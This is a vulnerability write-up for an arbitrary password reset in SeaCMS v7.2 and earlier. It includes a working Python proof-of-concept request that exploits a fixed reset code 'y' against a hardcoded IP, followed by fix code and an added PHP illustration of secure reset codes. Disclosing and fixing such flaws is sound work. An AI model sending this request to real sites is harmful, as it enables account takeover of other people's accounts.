SeaCMS <= v7.2 Arbitrary User Password Reset Vulnerability Reproduction

0x01 Description

SeaCMS (海洋cms) is a video content management system built around the core needs of site owners. A single program adapts to desktop, mobile, tablet and app entry points; it ships with no encrypted (obfuscated) code, is marketed as secure, and is popular with operators of video content sites.

0x02 Vulnerability Reproduction

Target system version:

We register two users: user:aaaaaa pass:aaaaaa

user:bbbbbb pass:bbbbbb

Vulnerability PoC:

import requests

session = requests.Session()
# Step 4 of the password-reset flow (mod=repsw4)
paramsGet = {"mod": "repsw4"}
# repswcode is the constant "y" rather than a secret tied to the account,
# so any repswname can be supplied; cckb is the "提交" (Submit) button value
paramsPost = {"cckb": "\u63d0\u4ea4", "repswname": "bbbbbb", "repswnew2": "aaaaaa", "repswcode": "y", "repswnew1": "aaaaaa"}
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Android 9.0; Mobile; rv:61.0) Gecko/61.0 Firefox/61.0", "Referer": "http://127.0.0.1/member.php?mod=repsw3&repswcode=y&repswname=User_B", "Connection": "close", "Accept-Language": "en", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded"}
cookies = {"PHPSESSID": "85a2970b95cf09d5472b13c211f2afe3"}
response = session.post("http://173.82.94.209/member.php", data=paramsPost, params=paramsGet, headers=headers, cookies=cookies)
print("Status code: %i" % response.status_code)
print("Response body: %s" % response.content)

Changing user bbbbbb's password to aaaaaa:

After the reset, user bbbbbb can no longer log in with the password bbbbbb:

Logging in with the password aaaaaa succeeds:

0x03 Closing Notes

Fix:

// Generate a random reset code instead of the fixed value "y".
// Note: mt_rand() is not a cryptographic RNG; random_int() is the stronger choice.
function randomkeys($length)
{
    $pattern = '1234567890abcdefghijklmnopqrstuvwxyz'
             . 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $key = '';
    for ($i = 0; $i < $length; $i++) {
        // indices 0-35 only reach the digits and lowercase letters
        $key .= $pattern[mt_rand(0, 35)];
    }
    return $key;
}
$repswcode = randomkeys(10);
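A random code on its own is only half of the fix: the code must also be bound to one account, expire, and be accepted only once. The following PHP is an added illustration, not SeaCMS code and not part of the original post; the class and function names (ResetCodeStore, issueResetCode, consumeResetCode, handleResetStep4), the in-memory store and the 15-minute lifetime are assumptions for the example.

```php
<?php
// Added illustration (not SeaCMS code): a password-reset flow in which the
// reset code is random, bound to one account, short-lived and single-use.
// ResetCodeStore and the functions below are assumed names for this example;
// a real deployment would back the store with the database.

final class ResetCodeStore
{
    /** @var array<string, array{hash: string, expires: int}> keyed by username */
    private array $codes = [];

    private const TTL_SECONDS = 15 * 60;   // assumed lifetime for the example

    // Issue a fresh code for one user. Only a hash is stored, so a database
    // leak does not yield usable codes; the raw code goes to the user out of band.
    public function issueResetCode(string $username): string
    {
        $code = bin2hex(random_bytes(16));   // 128 bits from the CSPRNG, not mt_rand()
        $this->codes[$username] = [
            'hash'    => hash('sha256', $code),
            'expires' => time() + self::TTL_SECONDS,
        ];
        return $code;
    }

    // Verify a submitted code for a specific user. The vulnerable flow accepted
    // the constant "y" for any repswname; here the code is looked up per account.
    public function consumeResetCode(string $username, string $submitted): bool
    {
        if (!isset($this->codes[$username])) {
            return false;                       // no code was ever issued for this account
        }
        $entry = $this->codes[$username];
        if (time() > $entry['expires']) {
            unset($this->codes[$username]);     // expired codes are discarded, not honoured
            return false;
        }
        // hash_equals() compares in constant time, so timing does not leak the code.
        $ok = hash_equals($entry['hash'], hash('sha256', $submitted));
        if ($ok) {
            unset($this->codes[$username]);     // single use: a replayed code fails
        }
        return $ok;
    }
}

// Handler sketch for the "set new password" step (mod=repsw4 in the PoC).
function handleResetStep4(ResetCodeStore $store, array $post): string
{
    $user = $post['repswname'] ?? '';
    $code = $post['repswcode'] ?? '';
    $new1 = $post['repswnew1'] ?? '';
    $new2 = $post['repswnew2'] ?? '';

    if ($new1 === '' || $new1 !== $new2) {
        return 'passwords do not match';
    }
    if (!$store->consumeResetCode($user, $code)) {
        return 'invalid or expired reset code';   // the PoC's request is stopped here
    }
    // password_hash() is where the new credential for $user would be stored.
    $hashed = password_hash($new1, PASSWORD_DEFAULT);
    return 'password updated (' . strlen($hashed) . '-char hash stored)';
}

// Constructed demonstration values.
$store  = new ResetCodeStore();
$issued = $store->issueResetCode('bbbbbb');
$form   = ['repswname' => 'bbbbbb', 'repswnew1' => 'aaaaaa', 'repswnew2' => 'aaaaaa'];

// 1) the PoC's fixed code "y" against the account
echo handleResetStep4($store, $form + ['repswcode' => 'y']), PHP_EOL;
// 2) the genuine code delivered to the account owner
echo handleResetStep4($store, $form + ['repswcode' => $issued]), PHP_EOL;
// 3) the same genuine code submitted a second time
echo handleResetStep4($store, $form + ['repswcode' => $issued]), PHP_EOL;
```

The handler never trusts repswcode or repswname on their own: the username selects which stored hash is compared, the comparison is constant-time, and the entry is deleted on success or expiry, so the fixed-value and replay cases that the PoC relies on are both rejected.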

The vulnerability has no preconditions at all: an attacker can directly reset any user's password. Administrators should apply the fix as soon as possible.
